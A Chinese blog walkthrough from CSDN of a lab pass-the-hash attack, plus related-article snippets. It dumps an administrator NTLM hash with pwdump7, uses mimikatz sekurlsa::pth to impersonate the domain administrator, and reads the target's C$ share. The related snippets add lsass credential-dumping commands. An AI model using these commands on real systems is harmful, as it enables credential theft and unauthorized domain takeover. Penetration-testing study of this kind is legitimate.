使用mimikatz利用哈希传递获取域控权限

最新推荐文章于 2024-05-16 16:36:26 发布
最新推荐文章于 2024-05-16 16:36:26 发布
阅读量991 收藏 2
点赞数
分类专栏: 内网渗透 文章标签: 频域 哈希
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54713392/article/details/118343438
版权

使用mimikatz利用哈希传递获取域控权限

靶机 window server 2012 IP 192.168.1.22
攻击机 window7 IP 192.168.1.34
(1)win2012 server获取目标hash对应用户名administrator,500,获取目标的NTLM哈希值可以使用mimikatz或者pwdump7
使用pwdump7,执行命令Pwdump7.exe
在这里插入图片描述

导出信息到1.txt中
在这里插入图片描述

复制出ntlm

CE28B42F9943D0552385BC5F6338F9B9

(2)在攻击机上管理员权限打开mimikatz
找到mimikatz对应的位置,执行命令mimikatz.exe
在这里插入图片描述

提权执行privilege::debug
在这里插入图片描述

再执行sekurlsa::pth /user:administrator /domain:demo.com /ntlm:CE28B42F9943D0552385BC5F6338F9B9
成功打开另外一个cmd
在这里插入图片描述

在新的cmd命令行中输入dir \\192.168.1.22\c$即可查看目标机器内容
在这里插入图片描述

清风-77
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mimikatz hash传递--获取域控权限
qq_46635165的博客
10-18 1906
mimikatz hash传递获取域控权限 实验环境 实验环境:win_server2012 ip:192.168.3.132 (内普通用户,有本地管理员权限,但不知明文密码) win_server2008 ip:192.168.3.133 (DC域控,与server2012管理员密码相同,但不知明文密码) 此时,你已经拿下了内一普通用户win_server2012 实验步骤 1,将mimikatz上传至win_server2012; 2,cd 至mimikatz目录; 3,使用reg命令,将注册表
内网横向移动|哈希传递PTH|mimikatz使用
qq_60115503的博客
04-25 5045
Mimikatz是法国人benjamin开发的一款强大的轻量级调式工具,本意是用来个人测试,但由于其功能强大,能够直接读取Windows-XP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具
渗透之明文传递&hash传递
最新发布
qq_55202378的博客
05-16 383
在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?这里提供一条思路:在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。mimikaze抓取windows用户名、密码。建立IPC常见的错误代码。
【渗透测试笔记】之【内网渗透——横向移动:使用mimikatz和CS进行哈希传递攻击】
AA8j的博客
11-15 3423
文章目录1. mimikatz1.1 NTLM Hash传递攻击1.2 AES-256 哈希传递攻击2. CS2.1 获得一个Beacon2.2 dump Hash2.2.1 方法一2.2.2 方法二2.2.3 查看2.3 哈希传递攻击 1. mimikatz 地址:https://github.com/gentilkiwi/mimikatz 1.1 NTLM Hash传递攻击 首先获得管NTLM Hash:【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段
mimikatz使用哈希 ntlm传递 票据传递
YouthBelief的博客
12-16 1929
(1)管理员运行 (2)必须输入 privilege::debug (3)在目标主机使用mimikatz获取ntlm hash winserver 2012R2 之前版本 可以获取到明文密码 sekurlsa::logonpasswords (4) 哈希传递哈希传递到其他计算机上 进行登录域控验证 sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6
内网渗透测试小Demo-哈希传递攻击
Love&Share
11-26 2353
文章目录环境搭建Win Server2003Win Server2008拿shell收集信息哈希传递攻击mimikatz推荐阅读 环境搭建 Win Server2003 设置账户密码 右击我的电脑,选择管理,添加本地用户和组,重置admin的密码为123456,方便之后的操作 在vmware中为虚拟机添加一个网卡,网络连接选择LAN区段 开机后手动设置IP地址为 10.0.0.2/24 ipconfig Win Server2008 虚拟机网络连接选择LAN区段,开机后手动设置IP地址为 10.0.
WINDOWS 窃取hash实现远程登录
The current road is different, love needs to distinguish between right and wrong
11-18 874
前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 一、Windows常用用户 SYSTEM: #本地机器上拥有最高权限的用户。 Administrator: #本地机器上拥有最高权限的用户。 Guest: # 只拥有相对较少的权限,默认被禁用。 二、Windows密码安全 1. Quarks P...
mimikatz获取系统密码
03-28
1. **权限要求**: 要成功运行mimikatz,通常需要本地管理员权限,但某些操作可能需要更高的权限,如管理员。 2. **法律与道德**: 使用mimikatz必须遵守当地法律法规,确保在授权的范围内进行,否则可能触犯法律。...
mimikatz.zip附简单使用方法
08-01
mimikatz使用需要administrator用户执行,administrators中的其他用户都不行。 注意该程序会被ban 提升权限 privilege::debug 抓取密码 sekurlsa::logonpasswords reg add HKLM\SYSTEM\CurrentControlSet\Control...
一键获取windows密码神器mimikatz咪咪猫
07-23
3. **权限提升**:在使用Mimikatz时,往往需要提升权限,例如获取SeDebugPrivilege,这在Windows安全上下文中是关键步骤。 4. **防御Mimikatz**:为了防止Mimikatz被滥用,企业可以采取多种措施,如加强访问控制、...
mimikatz获取系统管理员账号明文密码工具
02-15
6. **Pass-the-hash和Pass-the-ticket**:mimikatz支持这两种常见的横向移动技术,允许攻击者使用NTLM哈希或Kerberos票证在不同系统间进行身份验证。 **使用场景** 1. **安全审计**:企业安全团队可以使用mimikatz...
windows内存密码获取mimikatz_trunk
04-17
第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180325
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
weixin_45715461的博客
06-05 1393
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
渗透之哈希传递攻击及其原理
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-09 1923
哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。在学习哈希传递攻击之前我们先来了解一下其背后的Windows 底层协议和原理。
Metasploitable靶机渗透
qq_51926773的博客
11-01 2943
1.导入命令ifconfig得到自己的本机ip(即攻击机) 2.在kali打开nmap,输入自己的本机ip范围,得到在同一局网的内存活的主机。 3.找到21端口,图片显示ftp。 4.接下来对靶场机器进行探测,我们使用nmap命令 nmap -sV ip/24,得到目标靶机ip 5.然后使用浏览器来浏览http服务的信息,在网址栏输入目标靶机ip 6.得到网页,网页给出信息,登录靶机的账号密码 7.然后输入telnet ip 登录靶机 8.之后再调出控制栏输入msfconsole,连接靶机.
技术分享 | mimikatz的常见使用方法
Uguardsec的博客
08-10 3154
0x00简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就
bat 远程桌面登陆 命令_内网渗透之命令行渗透 渗透红队笔记
weixin_39653766的博客
11-26 929
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 19 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更内网渗透在内网渗透的时候,如果想要登录远程桌面,会容易暴露自己,所以尽可能学会使用命令行操作会在渗透实际过程中有很大的帮助。命令行渗透IPC$建立ipc连接以后,就可以访问目标机器的文件(上传、下载),也可以在目标机器 上运行命令...
红队技巧-渗透的协议利用
qq_50854662的博客
03-27 1709
1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须通过解密hash值来获取明文密码,因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击,攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。 1.2 PTH限制 在03之后有了ua...
mimikatz在Win10及2012系统以后的明文抓取方式
热门推荐
netsec_steven的博客
07-10 1万+
1.procdump+mimikatz获取win10/win2012 R2用户明文密码 测试环境:win10企业版和win2012 R2 版本 工具下载:链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 原理:获取到内存文件lsass.exe进程(它用于本地安全和登陆策略)中存储的明文登录密码 利用前提:拿到了admin权限的cmd,管理员用密码登录机器,并运行了lsass.exe进程,把密码保存在内存文件lsass进程中。 抓.
使用L0phtCrack获取密码和使用mimikatz直接抓取Windows明文密码区别总结
03-22
L0phtCrack和mimikatz都是用于获取Windows系统密码的工具,但它们的工作原理不同...另外,使用L0phtCrack需要对密码进行破解,可能会被系统检测到并触发安全警报,而使用mimikatz则可以在不留下痕迹的情况下获取密码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值